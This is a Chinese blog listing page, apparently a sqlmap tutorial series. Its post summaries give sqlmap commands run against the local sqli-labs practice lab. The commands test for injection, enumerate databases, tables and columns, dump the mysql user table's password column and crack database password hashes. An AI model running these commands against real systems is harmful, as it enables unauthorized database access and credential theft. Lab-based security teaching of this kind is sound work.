摘要:        
列出当前网站使用的数据库用户 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user    阅读全文
posted @ 2022-10-02 21:23
y夏末y
阅读(111)
评论(0)
推荐(0)
        
            
        
        
摘要:        
列出当前网站使用的数据库 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db    阅读全文
posted @ 2022-10-02 21:20
y夏末y
阅读(152)
评论(0)
推荐(0)
        
            
        
        
摘要:        
列出数据库用户的密码 如果当前用户有读取包含用户密码的权限,SQLMap会先列举出用户,然后列出Hash,并尝试破解 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --passwords    阅读全文
posted @ 2022-10-02 21:18
y夏末y
阅读(1149)
评论(0)
推荐(0)
        
            
        
        
摘要:        
列出数据库中的所有用户 在当前用户有权读取包含所有用户的表的权限时,使用该命令列出所有管理用户 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --users    阅读全文
posted @ 2022-10-02 21:14
y夏末y
阅读(115)
评论(0)
推荐(0)
        
            
        
        
摘要:        
查询完字段名称之后,获取该字段的具体数据信息 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D mysql -T user -C user,password --dump    阅读全文
posted @ 2022-10-02 21:13
y夏末y
阅读(140)
评论(0)
推荐(0)
        
            
        
        
摘要:        
确定网站存在注入后,用于查询当前用户下的所有数据库 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbs    阅读全文
posted @ 2022-10-02 21:10
y夏末y
阅读(172)
评论(0)
推荐(0)
        
            
        
        
摘要:        
查询表名之后,查询表中的字段名 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D xssplatform -T oc_user --columns 后续注入--columns缩写成-C    阅读全文
posted @ 2022-10-02 20:57
y夏末y
阅读(112)
评论(0)
推荐(0)
        
            
        
        
摘要:        
查询完数据库后,查询指定数据库中所有的表名 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D xssplatform --tables 注意:-D大小写 --tables缩写成-T,意思是在某表中继续查询    阅读全文
posted @ 2022-10-02 20:53
y夏末y
阅读(377)
评论(0)
推荐(0)
        
            
        
        
摘要:        
从文件中加载HTTP请求,SQLMap可以从一个文本文件中获取HTTP请求,这样就可以不设置其他参数(如cookie、POST数据等),txt文件中的内容为Web数据包 文本文件如图(请求数据可以通过Fiddle抓到),红框自己写入: 判断是否存在注入的命令如下: python sqlmap.py     阅读全文
posted @ 2022-10-02 20:44
y夏末y
阅读(240)
评论(0)
推荐(0)
        
            
        
        
摘要:        
假设目标注入点是http://127.0.0.1/sqli-labs-master/Less-1/?id=1,判断其是否存在注入的命令如下: python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果如图: 运行完判断是    阅读全文
posted @ 2022-10-02 19:59
y夏末y
阅读(2017)
评论(0)
推荐(0)
        
            
        
        
摘要:        
SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Qracle、PostgreSQL、Microsoft SQL Server、Miscrosoft Access、IBM DB2、SQLite、Firebi    阅读全文
posted @ 2022-10-02 19:20
y夏末y
阅读(540)
评论(0)
推荐(0)
        
 
                     
                    
                 
                    
                
 
         浙公网安备 33010602011771号
浙公网安备 33010602011771号